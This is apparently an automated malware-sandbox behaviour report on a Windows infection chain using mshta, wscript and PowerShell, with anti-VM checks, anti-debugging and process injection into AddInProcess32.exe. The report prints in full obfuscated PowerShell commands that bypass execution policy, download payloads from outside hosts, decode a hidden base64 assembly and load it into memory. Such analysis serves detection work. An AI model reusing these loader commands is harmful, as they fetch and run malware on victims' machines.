Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3987	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5698	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7611	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2036	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 898	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4569	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5225	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ndpe2s1t\ndpe2s1t.dll

Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3568	Thread sleep time: -20291418481080494s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5348	Thread sleep count: 7611 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6712	Thread sleep count: 2036 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5476	Thread sleep time: -10145709240540247s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3604	Thread sleep count: 898 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3604	Thread sleep count: 284 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1828	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4876	Thread sleep count: 4569 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6116	Thread sleep count: 5225 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5700	Thread sleep time: -16602069666338586s >= -30000s	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: AddInProcess32.exe, 0000000C.00000002.3345591144.0000000002F59000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware
Source: powershell.exe, 00000003.00000002.2155460515.0000000007B46000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VBranchCaMSFT_NetEventVmNetworkAdatper.format.ps1xml
Source: powershell.exe, 00000003.00000002.2152246100.00000000053E6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: AddInProcess32.exe, 0000000C.00000002.3337236460.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: vmware
Source: wscript.exe, 00000007.00000002.2228642958.00000000056D3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}rr[
Source: powershell.exe, 00000003.00000002.2152246100.00000000053E6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: AddInProcess32.exe, 0000000C.00000002.3337236460.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: VMwareVBoxESelect * from Win32_ComputerSystem
Source: mshta.exe, 00000000.00000002.2142517039.0000000004EB0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\o6
Source: powershell.exe, 00000001.00000002.2277730748.0000000007769000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2290784362.00000000086E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000007.00000002.2228642958.00000000056D3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: powershell.exe, 00000001.00000002.2290784362.0000000008713000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWh
Source: powershell.exe, 00000003.00000002.2152246100.00000000053E6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: powershell.exe, 0000000A.00000002.2472760078.000000000746F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll@
Source: powershell.exe, 00000003.00000002.2155460515.0000000007B46000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FcheSecondaryMSFT_NetEventVmNetworkAdatper.cdxml
Source: AddInProcess32.exe, 0000000C.00000002.3356874468.00000000060DF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 12_2_01167090 CheckRemoteDebuggerPresent,

12_2_01167090

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: amsi32_7036.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7036, type: MEMORYSTR

Bypasses PowerShell execution policy

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdEcDNpbWFnZVVybCA9IEYxbWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MicrJ0FhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgRjFtO0RwM3dlJysnYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7RHAzaW1hZ2VCeXRlcyA9IERwM3dlYkNsaWVudCcrJy5Eb3cnKydubG9hZERhdGEoRHAzaW1hZycrJ2VVcicrJ2wpO0RwM2ltYWdlVGV4JysndCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKERwM2ltYWdlQnl0ZXMpO0RwM3N0YXJ0RmxhZyA9IEYxbTwnKyc8QkFTRTY0X1NUQVJUPj5GMW0nKyc7RHAzZW5kRmxhZyA9IEYxbTw8QkFTRTY0X0VORD4+RjFtO0RwM3N0YXJ0SScrJ25kZXggPSBEcDNpbWFnZVRleHQuSW5kZXhPZihEcDNzdGFydEZsYWcpO0RwM2VuZEluZGUnKyd4ID0gRHAzaW1hZ2VUZXh0LkluZGV4T2YoRHAzZW4nKydkJysnRmxhZyk7RHAzc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIERwM2VuZEluZGV4IC1nJysndCBEcDNzdGFydEluZGV4O0RwM3N0YXJ0SW5kZXggKz0gRHAzc3RhcnQnKydGJysnbGFnLkxlbmd0aDtEcDNiYXNlNjRMZW5ndGggPSBEcDNlbmRJbmRleCAtIERwM3N0YXJ0SW5kZXg7RHAzYmFzJysnZTY0Q29tbWFuZCA9IERwM2ltYWdlVGV4dC5TdWJzdHJpbmcoRHAzc3RhcnRJbmRleCwgRHAzYmFzZTY0TGVuZ3RoKTtEcDNiYXNlNjRSZXZlcicrJ3NlZCA9IC1qb2luIChEcDNiYXNlNjRDb21tYW5kLlRvQ2gnKydhckFyJysncmF5KCkgNTl0IEZvckVhY2gtT2JqZWN0IHsgRHAzXyB9KVstMS4uLScrJyhEcDNiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldO0RwM2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbicrJ2coJysnRHAzYicrJ2FzZTY0UmV2ZXJzZWQpO0RwM2xvYWQnKydlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZScrJ2N0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChEcDNjb21tYW5kQnl0ZXMpO0RwM3ZhaU1ldGhvZCcrJyA9JysnIFtkJysnbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoRjFtVkFJRjFtKTtEcDN2YWlNZXRob2QuSW52bycrJ2tlKERwM251bGwsIEAoRjFtdHh0LkZSRkZSVy8yNTMvMzEuMjIuMy4yOTEvLzpwdHRoRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGJysnMW1kZXNhdGl2YWRvRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGMW1BZGRJblAnKydyb2Nlc3MzJysnMkYxbSwgRjFtZGVzYXRpdmFkb0YxbSwgRjFtZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLEYxbWRlc2F0aXZhZG9GMScrJ20sRjFtJysnZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLCcrJ0YxbWRlc2F0aXZhZG9GMW0sRjFtMUYxbSxGMW1kZXNhdGl2YWRvRjFtKSk7JykuUkVwbGFjZSgoW2NoYVJdNzArW2NoYVJdNDkrW2NoYVJdMTA5KSxbc1RSSU5nXVtjaGFSXTM5KS5SRXBsYWNlKChbY2hhUl02OCtbY2hhUl0xMTIrW2NoYVJdNTEpLCckJykuUkVwbGFjZSgoW2NoYVJdNTMrW2NoYVJdNTcrW2NoYVJdMTE2KSxbc1RSSU5nXVtjaGFSXTEyNCl8IC4oKEdldC1WQVJJYWJMRSAnKm1kcionKS5OYW1lWzMsMTEsMl0tSm9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD

Injects a PE file into a foreign processes

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 43E000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 440000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: C42008	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSteM32\WInDowspoWeRShelL\V1.0\POWeRSHElL.EXe" "PoWERsHelL.Exe -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe ; INVoKe-ExPReSSIOn($(InVOkE-exPReSSIon('[sYStEM.Text.ENcODInG]'+[CHAR]58+[CHar]58+'utf8.GETstRIng([sYstEM.CONVeRt]'+[ChAR]58+[chaR]58+'FROMBAsE64sTRING('+[CHaR]34+'JGsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtQmVyREVGaW5JVGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkQ2JwY2N4dVFRbSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJek1tLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFppdmRUcFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZVeUZIc2dOZSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrVU96SGNmbHp5KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGZCIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIU2Jmb1ZwbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkazo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyLjEzL3hhbXBwL3NlL3NlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2l0aGdyZWF0dGhpbmdzd2l0aGxvdmVya2lzcy50SUYiLCIkRW5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIiwwLDApO1NUYVJ0LXNsZUVwKDMpO2lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIg=='+[cHaR]0x22+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ndpe2s1t\ndpe2s1t.cmdline"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthingswithloverkis.vbS"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4D39.tmp" "c:\Users\user\AppData\Local\Temp\ndpe2s1t\CSCD8BAC46370384FA881732B4F85FC96.TMP"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdEcDNpbWFnZVVybCA9IEYxbWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MicrJ0FhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgRjFtO0RwM3dlJysnYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7RHAzaW1hZ2VCeXRlcyA9IERwM3dlYkNsaWVudCcrJy5Eb3cnKydubG9hZERhdGEoRHAzaW1hZycrJ2VVcicrJ2wpO0RwM2ltYWdlVGV4JysndCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKERwM2ltYWdlQnl0ZXMpO0RwM3N0YXJ0RmxhZyA9IEYxbTwnKyc8QkFTRTY0X1NUQVJUPj5GMW0nKyc7RHAzZW5kRmxhZyA9IEYxbTw8QkFTRTY0X0VORD4+RjFtO0RwM3N0YXJ0SScrJ25kZXggPSBEcDNpbWFnZVRleHQuSW5kZXhPZihEcDNzdGFydEZsYWcpO0RwM2VuZEluZGUnKyd4ID0gRHAzaW1hZ2VUZXh0LkluZGV4T2YoRHAzZW4nKydkJysnRmxhZyk7RHAzc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIERwM2VuZEluZGV4IC1nJysndCBEcDNzdGFydEluZGV4O0RwM3N0YXJ0SW5kZXggKz0gRHAzc3RhcnQnKydGJysnbGFnLkxlbmd0aDtEcDNiYXNlNjRMZW5ndGggPSBEcDNlbmRJbmRleCAtIERwM3N0YXJ0SW5kZXg7RHAzYmFzJysnZTY0Q29tbWFuZCA9IERwM2ltYWdlVGV4dC5TdWJzdHJpbmcoRHAzc3RhcnRJbmRleCwgRHAzYmFzZTY0TGVuZ3RoKTtEcDNiYXNlNjRSZXZlcicrJ3NlZCA9IC1qb2luIChEcDNiYXNlNjRDb21tYW5kLlRvQ2gnKydhckFyJysncmF5KCkgNTl0IEZvckVhY2gtT2JqZWN0IHsgRHAzXyB9KVstMS4uLScrJyhEcDNiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldO0RwM2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbicrJ2coJysnRHAzYicrJ2FzZTY0UmV2ZXJzZWQpO0RwM2xvYWQnKydlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZScrJ2N0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChEcDNjb21tYW5kQnl0ZXMpO0RwM3ZhaU1ldGhvZCcrJyA9JysnIFtkJysnbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoRjFtVkFJRjFtKTtEcDN2YWlNZXRob2QuSW52bycrJ2tlKERwM251bGwsIEAoRjFtdHh0LkZSRkZSVy8yNTMvMzEuMjIuMy4yOTEvLzpwdHRoRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGJysnMW1kZXNhdGl2YWRvRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGMW1BZGRJblAnKydyb2Nlc3MzJysnMkYxbSwgRjFtZGVzYXRpdmFkb0YxbSwgRjFtZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLEYxbWRlc2F0aXZhZG9GMScrJ20sRjFtJysnZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLCcrJ0YxbWRlc2F0aXZhZG9GMW0sRjFtMUYxbSxGMW1kZXNhdGl2YWRvRjFtKSk7JykuUkVwbGFjZSgoW2NoYVJdNzArW2NoYVJdNDkrW2NoYVJdMTA5KSxbc1RSSU5nXVtjaGFSXTM5KS5SRXBsYWNlKChbY2hhUl02OCtbY2hhUl0xMTIrW2NoYVJdNTEpLCckJykuUkVwbGFjZSgoW2NoYVJdNTMrW2NoYVJdNTcrW2NoYVJdMTE2KSxbc1RSSU5nXVtjaGFSXTEyNCl8IC4oKEdldC1WQVJJYWJMRSAnKm1kcionKS5OYW1lWzMsMTEsMl0tSm9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Dp3imageUrl = F1mhttps://1017.filemail.com/api/file/get?filekey=2'+'Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f F1m;Dp3we'+'bClient = New-Object System.Net.WebClient;Dp3imageBytes = Dp3webClient'+'.Dow'+'nloadData(Dp3imag'+'eUr'+'l);Dp3imageTex'+'t = [System.Text.Encoding]::UTF8.GetString(Dp3imageBytes);Dp3startFlag = F1m<'+'<BASE64_START>>F1m'+';Dp3endFlag = F1m<<BASE64_END>>F1m;Dp3startI'+'ndex = Dp3imageText.IndexOf(Dp3startFlag);Dp3endInde'+'x = Dp3imageText.IndexOf(Dp3en'+'d'+'Flag);Dp3startIndex -'+'ge 0 -and Dp3endIndex -g'+'t Dp3startIndex;Dp3startIndex += Dp3start'+'F'+'lag.Length;Dp3base64Length = Dp3endIndex - Dp3startIndex;Dp3bas'+'e64Command = Dp3imageText.Substring(Dp3startIndex, Dp3base64Length);Dp3base64Rever'+'sed = -join (Dp3base64Command.ToCh'+'arAr'+'ray() 59t ForEach-Object { Dp3_ })[-1..-'+'(Dp3base64Comma'+'nd.Length)];Dp3commandBytes = [System.Convert]::FromBase64Strin'+'g('+'Dp3b'+'ase64Reversed);Dp3load'+'edAssembly = [System.Refle'+'ction.Assembly]'+'::Load(Dp3commandBytes);Dp3vaiMethod'+' ='+' [d'+'nlib.IO.Home].GetMethod(F1mVAIF1m);Dp3vaiMethod.Invo'+'ke(Dp3null, @(F1mtxt.FRFFRW/253/31.22.3.291//:ptthF1m, F1mdesativadoF1m, F'+'1mdesativadoF1m, F1mdesativadoF1m, F1mAddInP'+'rocess3'+'2F1m, F1mdesativadoF1m, F1mdesativadoF1m,F1mdesativadoF1m,F1mdesativadoF1'+'m,F1m'+'desativadoF1m,F1mdesativadoF1m,'+'F1mdesativadoF1m,F1m1F1m,F1mdesativadoF1m));').REplace(([chaR]70+[chaR]49+[chaR]109),[sTRINg][chaR]39).REplace(([chaR]68+[chaR]112+[chaR]51),'$').REplace(([chaR]53+[chaR]57+[chaR]116),[sTRINg][chaR]124)\| .((Get-VARIabLE 'mdr').Name[3,11,2]-JoiN'')"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]34+'jgsgicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagyurklxrzcgugicagicagicagicagicagicagicagicagicagicagicattwvtqmvyrevgaw5jvglvbiagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1cmxtt04ilcagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbkq2jwy2n4dvfrbsxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbjek1tlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagifppdmrucfysdwludcagicagicagicagicagicagicagicagicagicagicagigzveuzic2dozsxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbrvu96sgnmbhp5ktsnicagicagicagicagicagicagicagicagicagicagicaglw5htuugicagicagicagicagicagicagicagicagicagicagicaizgzciiagicagicagicagicagicagicagicagicagicagicagic1oyu1fc1bbq2ugicagicagicagicagicagicagicagicagicagicagicbiu2jmb1zwbiagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicakazo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze5mi4zljiyljezl3hhbxbwl3nll3nlzxrozwjlc3r0agluz3nlbnrpcmv0aw1ld2l0agdyzwf0dghpbmdzd2l0agxvdmvya2lzcy50suyilcikrw5wokfquerbvefcc2vldghlymvzdhroaw5nc2vudglyzxrpbwv3axroz3jlyxr0agluz3n3axrobg92zxjraxmudmjtiiwwldapo1nuyvj0lxnszuvwkdmpo2lfecagicagicagicagicagicagicagicagicagicagicagicikru5wokfquerbvefcc2vldghlymvzdhroaw5nc2vudglyzxrpbwv3axroz3jlyxr0agluz3n3axrobg92zxjraxmudmjtig=='+[char]0x22+'))')))"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 